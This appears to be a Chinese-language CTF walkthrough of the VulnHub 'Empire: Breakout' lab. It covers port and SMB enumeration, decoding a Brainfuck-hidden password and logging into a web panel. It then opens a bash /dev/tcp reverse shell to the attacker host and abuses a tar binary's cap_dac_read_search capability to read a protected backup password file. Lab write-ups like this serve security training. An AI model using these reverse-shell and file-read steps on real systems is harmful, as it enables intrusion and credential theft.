靶场链接:https://www.vulnhub.com/entry/empire-breakout,751/
Name: Empire: Breakout
Date release: 21 Oct 2021
Author: icex64 & Empire Cybersecurity
Series: Empire
扫描ip地址和mac地址
arp-scan -l
![](https://img-blog.csdnimg.cn/img_convert/6fb94edd2d2959fe2ea820236b0439fd.png)
kali主机ip:192.168.241.129
靶机主机ip:192.168.241.130
nmap扫描靶机端口
nmap -T4 -sV -p- -A 192.168.241.130
![](https://img-blog.csdnimg.cn/img_convert/731fe8b8977d7d938f2963a1035d24be.png)
获得信息:
以开启80,10000,20000网页端口
139和445是安装了samba服务的端口
![](https://img-blog.csdnimg.cn/img_convert/5b46dba07dfdf81a8f0ba6f2db5cb2ef.png)
80端口是默认网页,检查源代码发现有点像brainfuck编译器,
brainfuck:++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
编译后:.2uqPEfj3D<P'a-3
10000端口和20000端口分别是两个登录页面
![](https://img-blog.csdnimg.cn/img_convert/84d46728640ff28fa11708c960abc05c.png)
![](https://img-blog.csdnimg.cn/img_convert/6e83aa777ac3a0de700ac9b1c6907ff7.png)
尝试admin,root与上述的密码都无法登录,再看看系统有没有其他信息
发现还有samba服务,尝试用enum4linux查看信息
enum4linux 192.168.241.130
![](https://img-blog.csdnimg.cn/img_convert/617d912b0301d0e72e340d7f07ede2a9.png)
发现用户名:cyber,尝试用户名和密码登录,直接成功。
页面的功能查看一遍,发现有一个按钮弹出cmd shell
![](https://img-blog.csdnimg.cn/img_convert/f392b37a41f3fb7859dddbd72c313709.png)
尝试反弹shell
bash -i &>dev/tcp/192.168.241.129/111 <&1
nc -nlvp 111
![](https://img-blog.csdnimg.cn/img_convert/9c9e9f4efdc55ffb8dd9544cb69bac59.png)
成功反弹shell,接下来看看有没有其他信息
发现当前目录有两个文件,tar和user.txt
![](https://img-blog.csdnimg.cn/img_convert/d3c55e3a3082c65da3f0af49ad525879.png)
tar是打包文件,但是放在这个目录下,猜测有作用,getcap查看权限
![](https://img-blog.csdnimg.cn/img_convert/0857f61359151e409be1a7f5b689e24f.png)
发现cap_dac_read_search=ep,官方解释是:忽略所有对读、搜索操作的限制
查看大佬的wp,发现是一个var/backups/.old_pass.bak,但这个文件无权限执行,想起来使用tar文件先打包这个文件,然后再解压就可以查看了
打包:./tar -cvf oldpass.tar /var/backups
解压:./tar -xvf oldpass.tar -C ./oldpass
![](https://img-blog.csdnimg.cn/img_convert/db2f6c3862ae1863025baaa8dfe803de.png)
成功获得密码:Ts&4&YurgtRX(=~h
![](https://img-blog.csdnimg.cn/img_convert/6c33a5a241e4336a3df96a98f7182e74.png)
![](https://img-blog.csdnimg.cn/img_convert/494c263ff190f3f77b2987be9abd81af.png)